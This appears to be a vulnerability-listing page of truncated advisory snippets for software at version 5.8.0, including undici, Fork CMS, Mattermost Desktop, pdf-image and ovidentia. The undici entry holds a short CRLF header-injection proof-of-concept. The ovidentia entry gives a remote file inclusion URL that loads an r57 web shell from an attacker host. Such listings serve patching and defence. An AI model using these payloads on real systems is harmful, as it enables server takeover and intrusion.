Trivision NC227WF 安全漏洞

Trivision NC227WF is a webcam from Trivision. A security vulnerability exists in Trivision NC227WF version v5.8.0, which stems from a password being transmitted via a query string...

CVE-2024-45835

Mattermost Desktop App versions =5.8.0 fail to sufficiently configure Electron Fuses which allows an attacker to gather Chromium cookies or abuse other misconfigurations via remote/local access...

flightaware 安全漏洞

flightaware is a software application. It is used for flight tracking and data processing. A security vulnerability exists in flightaware version v.5.8.0, which originates from an unauthorized application causing a persistent denial of service by manipulating database files...

undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect

Impact Authorization headers are already cleared on cross-origin redirect in https://github.com/nodejs/undici/blob/main/lib/handler/redirect.jsL189, based on https://github.com/nodejs/undici/issues/872. However, cookie headers which are sensitive headers and are official headers found in the spec...

undici before v5.8.0 vulnerable to CRLF injection in request headers

Impact It is possible to inject CRLF sequences into request headers in Undici. js const undici = require'undici' const response = undici.request"http://127.0.0.1:1000", headers: 'a': "\r\nb" The same applies to path and method Patches Update to v5.8.0 Workarounds Sanitize all HTTP headers from...

Cross-site scripting in forkcms

Fork CMS Content Management System v5.8.0 was discovered to contain a cross-site scripting XSS vulnerability in the Displayname field when using the Add, Edit or Register' functions. This vulnerability allows attackers to execute arbitrary web scripts or HTML...

CVE-2020-23049

Fork CMS Content Management System v5.8.0 was discovered to contain a cross-site scripting XSS vulnerability in the Displayname field when using the Add, Edit or Register' functions. This vulnerability allows attackers to execute arbitrary web scripts or HTML...

Cross site scripting

Fork CMS Content Management System v5.8.0 was discovered to contain a cross-site scripting XSS vulnerability in the Displayname field when using the Add, Edit or Register' functions. This vulnerability allows attackers to execute arbitrary web scripts or HTML...

CVE-2020-23049

Fork CMS Content Management System v5.8.0 was discovered to contain a cross-site scripting XSS vulnerability in the Displayname field when using the Add, Edit or Register' functions. This vulnerability allows attackers to execute arbitrary web scripts or HTML...

Fork CMS 5.8.0 Script Insertion

Document Title: =============== Fork CMS v5.8.0 - Multiple Persistent Web Vulnerbilities References Source: ==================== https://www.vulnerability-lab.com/getcontent.php?id=2208 ID 3073: https://github.com/forkcms/forkcms/pull/3073 Release Date: ============= 2020-04-17 Vulnerability...

Node.js third-party modules: Command injection in 'pdf-image'

I would like to report command injection in pdf-image It allows executing commands on the server Module module name: pdf-image version: 1.0.5 npm page: https://www.npmjs.com/package/pdf-image Module Description Provides an interface to convert PDF's pages to png files in Node.js by using...

multiple file inclusion exploits in ovidentia v5.8.0

multiple file inclusion exploits in ovidentia v5.8.0 forum type : ovidentia v5.8.0 bug found by : black-code&sweet-devil team : site-down type : file include exploits : http://www.example.com/orid/index.php?babInstallPath=http://Yoursite.com/r57.txt?...